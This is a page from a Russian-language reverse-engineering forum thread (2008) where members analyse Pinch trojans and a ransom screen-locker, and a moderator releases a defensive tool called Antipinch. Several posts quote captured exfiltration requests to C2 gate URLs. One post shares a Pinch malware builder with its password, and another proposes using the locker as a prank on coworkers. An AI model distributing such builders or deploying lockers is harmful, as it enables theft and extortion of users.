Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых)

 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
Посл.ответ Сообщение

Ранг: -0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 октября 2006 23:15 · Поправил: Модератор
· Личное сообщение · #1

В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.




Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 04 февраля 2008 12:38
· Личное сообщение · #2

Gambit - это который copy.exe копирует на все диски?



Ранг: 72.3 (постоянный)
Активность: 0.040
Статус: Участник

Создано: 04 февраля 2008 12:57 · Поправил: sER
· Личное сообщение · #3

Ice-T, файло не качал, но по описанию похоже что именно это(что ты написал в конце) он и делает..., таким образом он запускает файл прямо из памяти не скидывая его на диск =))




Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 04 февраля 2008 14:00 · Поправил: Gambit
· Личное сообщение · #4

Ara
Не.. это более извращенческое =(
Чем оно упаковано?
Блин.. оказался бОян =
amvo.exe

-----
программистом не рождаются - им умирают





Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 07 февраля 2008 21:14
· Личное сообщение · #5

решил наконец зарелизить:

...:::[Antipinch 0.1]:::...

Тулза предназначена для анализа подозрительных exe файлов и позволяет определить
наличие известного трояна Pinch в них.


[x] запускает подозрительный файл и внедряет в него dll.
[x] перехватывает CreateProcessA/CreateProcessW и вдедряет dll в дочернии процессы.
[x] перехватывает connect/send и не позволяет трояну отправить данные на гейт.
[x] в результате работы создаёт подробный лог файл.
[x] ВНИМАНИЕ, пока работает только с гейтовой версией пинча.
[x] рекомендуется запускать при отключенном интернете или на виртуальной ОС.


скачать видео пособие http://hellspawn.nm.ru/works/info_antipinch.zip
скачать Antipinch 0.1 http://hellspawn.nm.ru/works/antipinch_0.1.zip

p.s. Кинте плз линк на "мыльный" билд.

-----
[nice coder and reverser]





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 07 февраля 2008 21:58
· Личное сообщение · #6

Pinch3 Builder 1.2
pass: 123

180a_07.02.2008_CRACKLAB.rU.tgz - pinch3 Builder.rar

-----
iNTERNATiONAL CoDE CReW





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 07 февраля 2008 22:00
· Личное сообщение · #7

Hellspawn

hellspawn.nm.ru/works/antipinch_0.1.zip
Предупреждение о мошенничестве

Страница, которую вы пытаетесь открыть, занесена в черный список как мошенническая. Вероятно, будет предпринята попытка получить личную или финансовую информацию обманным путем. Посещение данной страницы не рекомендуется. Дополнительные сведения о защите от мошенничества.

Ты кому-то видать насолил...

-----
iNTERNATiONAL CoDE CReW





Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 07 февраля 2008 22:05 · Поправил: Hellspawn
· Личное сообщение · #8

ыыы бред) залил ещё сюды:

nezumi.org.ru/hellspawn/antipinch_0.1.zip
nezumi.org.ru/hellspawn/info_antipinch.zip

-----
[nice coder and reverser]





Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 07 февраля 2008 23:55 · Поправил: KingSise
· Личное сообщение · #9

Вот есчо одна шутка, даже не знаю как назвать... Типа вирус, блочит рабочий стол и воводит сообщение о том, что б его разблочить - нужно заплатить 200 рублей...

Запустил ради прикола у себя (тругим лучше ВМварэ юзать), реально все заблочилось... Прописывается в автозагрузке в реестре и гдето в профиле текущего пользователся. Сама программа которая все блочит гдето в профиле и валяется, от тудова и грузится... А какае то дллка, загружаемая автоматом из реестра это все контролирует...

Если расковырять программку и вытянуть непосредственно ту, что все блочит - получится хорошая шутка на работе


Файл успешно закачан: dump.ru/files/o/o062191886/
пасс на архив "1!

-----
-=истина где-то рядом=-





Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 08 февраля 2008 00:17
· Личное сообщение · #10

я помню подобную дрянь подцепил тоже. только там всё в реестр прописывалось и просили вроде 150 рэ... рабочий стол был сдвинут, на часах в трее вместо даты было что-то матом написано, в заголовке ie - мой жопорез и т.д. не работали все иконки с раб. стола, но работала панель задач. собственно с неё я и вызывал regedit (командная строка была тоже "заблокировна администратором"). просьбе о переводе показывалась в виде рисунка при загрузке. рисунок лежал в системной папке. пошукав по дате создания нашёл сам рег-файл в котором с смотрел, что мне изменили. потом отправил автору мыльце с посылом в очень далёкие края, а сам патч (типа, универсальный кряк для почти 1000 програм. мол, в реестр серийники прописывает) в лабу касперу. через день я даже не мог открыть рег-файл - каспер ругался...

-----
Do Not Get Mad Get Money! ;)





Ранг: 312.0 (мудрец), 349thx
Активность: 0.460.65
Статус: Участник
Advisor

Создано: 08 февраля 2008 01:20
· Личное сообщение · #11

KingSise пишет:
блочит рабочий стол и воводит сообщение о том, что б его разблочить - нужно заплатить 200 рублей...

Дык...эт местный прикол, мелькал по осени, там две записи в реестре, и файло переименованное под проводник кажетЦа.
С лайвсиди килятетЦа на раз два три...

-----
Чтобы юзер в нэте не делал,его всё равно жалко..




Ранг: 163.7 (ветеран)
Активность: 0.070
Статус: Участник

Создано: 08 февраля 2008 02:04
· Личное сообщение · #12

Куда катится мир, какие то вандалы-попрошайки, WM воры и прочие черти. Помню препод рассказывал про банковского девелопера, который остаток от округления при подсчёте процентов (раньше просто забывался, тк там меньше цента суммы) переводил себе на счёт пока налоговая не приехала - не учел, что оборот большой =)




Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 08 февраля 2008 02:39
· Личное сообщение · #13

Bronco пишет:
С лайвсиди килятетЦа на раз два три...


Я сделал бэкап реестра с лайвсиди, порога всеравно грузилась (в профиле видать прописалась есчо)... Но теперь можно было зайти в другую учетную запись и удалить файло с профиля... Особо эту хрень не копал, но честно скажу, ожидал большего, руткит какой-нибудь... А так лажа, но поиграться, - прикольно.

-----
-=истина где-то рядом=-





Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 08 февраля 2008 05:10
· Личное сообщение · #14

Это какойто модифицированный вирус, заблочил все нах и "БЛ%ДЬ" в часах написал... Поудалял я все файло им созданное, а он всеравно гдето запускается... В реестре вроде ничего новое в автозапуске не появилось... Почистил учетную запись пользователя, где эту хрень запускал, все восстановилось кроме прав, исполняемые файлы попрежнему не запускаются, надо вобщем бэкап реестра наместо поставить, но как это в ВМ сделать - хз, проще клонировать

-----
-=истина где-то рядом=-





Ранг: 312.0 (мудрец), 349thx
Активность: 0.460.65
Статус: Участник
Advisor

Создано: 08 февраля 2008 08:47
· Личное сообщение · #15

KingSise
в \system32 ищи по дате

-----
Чтобы юзер в нэте не делал,его всё равно жалко..




Ранг: 1.6 (гость)
Активность: 0=0
Статус: Участник

Создано: 08 февраля 2008 13:38
· Личное сообщение · #16

Очередной улов в локалке

1345_08.02.2008_CRACKLAB.rU.tgz - loadadv540.exe




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 08 февраля 2008 13:40
· Личное сообщение · #17

KingSise
www.threatexpert.com/report.aspx?uid=7c395cb3-1c34-4034-9e01-f5bd644186d8
analysis.seclab.tuwien.ac.at/result.php?taskid=20099769b842b5747183d00cb38043f5

проверяй кучу веток реестра, проверяй файлы, грохай то что насоздавалось.

-----
Computer Security Laboratory





Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 08 февраля 2008 14:05 · Поправил: Hellspawn
· Личное сообщение · #18

Klever
стучит суда:
_ttp://acdedblshd.com/progs/tdarf/vwjjbss.php?adv=adv540
от сюда льёт файло:
_ttp://acdedblshd.com/progs/tdarf/vsskkopgtx.php

Backdoor.Win32.Agobot.app ndovla.exe (сливает его)
Heur.KillFiles (модификация) loadadv540.exe

-----
[nice coder and reverser]





Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 08 февраля 2008 19:17 · Поправил: KingSise
· Личное сообщение · #19

[HEX], пасибки, то что нужно... Я впринцепе так и предпологал, ток не знаю как реестр в ВМварэ бэкапить...

Но инфа в первой ссылке не полная, кроме создания папок и мидифицирования раестра вись комипует свои копии ( 3 насчитал) в разные папочки... Кроме того гадит в профиле текущего пользователя, т.е. после полного восстановления реестра, нужно будет есчо и профиль почистить...

-----
-=истина где-то рядом=-





Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 08 февраля 2008 20:05
· Личное сообщение · #20

гг... бредовая идея... а может заплатить ему, получить от него способ/антивирь и потом давать народу, кто подцепит эту гадость?
(блин... вот я чушь несу...)

-----
Do Not Get Mad Get Money! ;)





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 10 февраля 2008 09:20 · Поправил: Flint
· Личное сообщение · #21

Hellspawn пишет:
решил наконец зарелизить:

...:::[Antipinch 0.1]:::...


Респект, давно думал о реализации такой вещи. Будет время, на днях потестю

Hellspawn пишет:
Кинте плз линк на "мыльный" билд.


Какие проблемы заходи на dump.ru или webfile.ru в строке поиска напиши pinch.exe

________

ADD: Посмотрел, а самое главное почему не показывает куда отчеты должны уходить?

-----
Nulla aetas ad discendum sera





Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 11 февраля 2008 02:58 · Поправил: Hellspawn
· Личное сообщение · #22

_ttp://egoakk.at.ua/load/ - тут софт для вконтакта склеенный с пинчем)

POST /my/rtest/e.php HTTP/1.0
Host: _ww.poncher.110mb.com


-----
[nice coder and reverser]




Ранг: 0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 11 февраля 2008 10:04
· Личное сообщение · #23

«Вы проебали свой номер Вам сюда!»... exprogs.ru/icq
Гейт...)) exprogs.ru/gate




Ранг: 95.2 (постоянный)
Активность: 0.040
Статус: Участник

Создано: 12 февраля 2008 09:40
· Личное сообщение · #24

«Вы проебали свой номер Вам сюда!»... exprogs.ru/icq
Гейт...)) exprogs.ru/gate
Боян =))))
Владелец данного сайтеса некто Гангстер, использует связку ICE Pack (http://exprogs.ru/ice/admin)...А пару недель назад он сам лишился своего шестизнака 823-343
ПС: нехер пинчей рассылать!

-----
бессмысленные манипуляции не становятся более разумными если их повторять




Ранг: 1.6 (гость)
Активность: 0=0
Статус: Участник

Создано: 20 февраля 2008 20:11
· Личное сообщение · #25

Очередная зверушко:

9bb6_20.02.2008_CRACKLAB.rU.tgz - Patch_1.6.8.exe




Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 20 февраля 2008 20:35 · Поправил: Hellspawn
· Личное сообщение · #26

[Info] -----------------------------------------------------
Scan: PINCH SIGNATURE DETECTED
[Packet] ---------------------------------------------------
POST /gate/gate.php HTTP/1.0
Host: userGH.freehostia.com
...
[End] ------------------------------------------------------


з.ы. я быстрее ;)

-----
[nice coder and reverser]





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 20 февраля 2008 20:35 · Поправил: [HEX]
· Личное сообщение · #27

Klever
Очередной Пинч с шлюзом hxxp://usergh.freehostia.com/gate/gate.php

P.S. :P ну и ладно.

-----
Computer Security Laboratory




Ранг: 1.6 (гость)
Активность: 0=0
Статус: Участник

Создано: 20 февраля 2008 21:22 · Поправил: Klever
· Личное сообщение · #28

А понял, нашёл этого "Антипыча" да сходится ;)
Смотрю сейчас, там в гейте уже шеллы пробуют закачать ))
О! Там гейт с админкой,
gate.php?stat=1
genom




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 21 февраля 2008 01:54
· Личное сообщение · #29

Ебнул гейт чтобы отчеты не собирал. Правда он его снова зальет наверника...

-----
Computer Security Laboratory





Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 21 февраля 2008 17:03
· Личное сообщение · #30

тут уже говорили про Bonjour. кто-нить проверял его детально? у меня кореш называет это вирусом. говорит что он ничего не даёт с собой сделать и вроде как пачкает архивы. не даёт поставить антивирь, а нода вообще снёс установленного. вроде и на флешку сам скопировался. никто с подобным "француским приветом" в последнее время не сталкивался?

-----
Do Not Get Mad Get Money! ;)





Ранг: 106.6 (ветеран)
Активность: 0.10
Статус: Участник

Создано: 21 февраля 2008 17:53
· Личное сообщение · #31

Talula, я несмотрел че он творит, но у друга была эта хрень, с архивами ниче неделал, аверы без проблем давал поставить (каспер, веб, нода), авер несносил (веб), на флехи ниче некопировал, так же вместе с этой хренью появился файл service.exe в папке system32 и еще парочка com файлов левых, тоже в папке винды (названия файлов непомню). Друг сносил этот Bonjour из другой системы, так же эта хрень пробывала вылазить в инет, но фаером норм блокирывалась, жила эта хрень на компеге друга около месяца, ниче заметного не произошло с системой до сих пор.
З.Ы. Еще в автозапуске прописывался этот "французский привет"


<< 1 ... 18 . 19 . 20 . 21 . 22 . 23 . 24 . 25 . 26 . 27 . 28 ... 47 . 48 . >>
 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати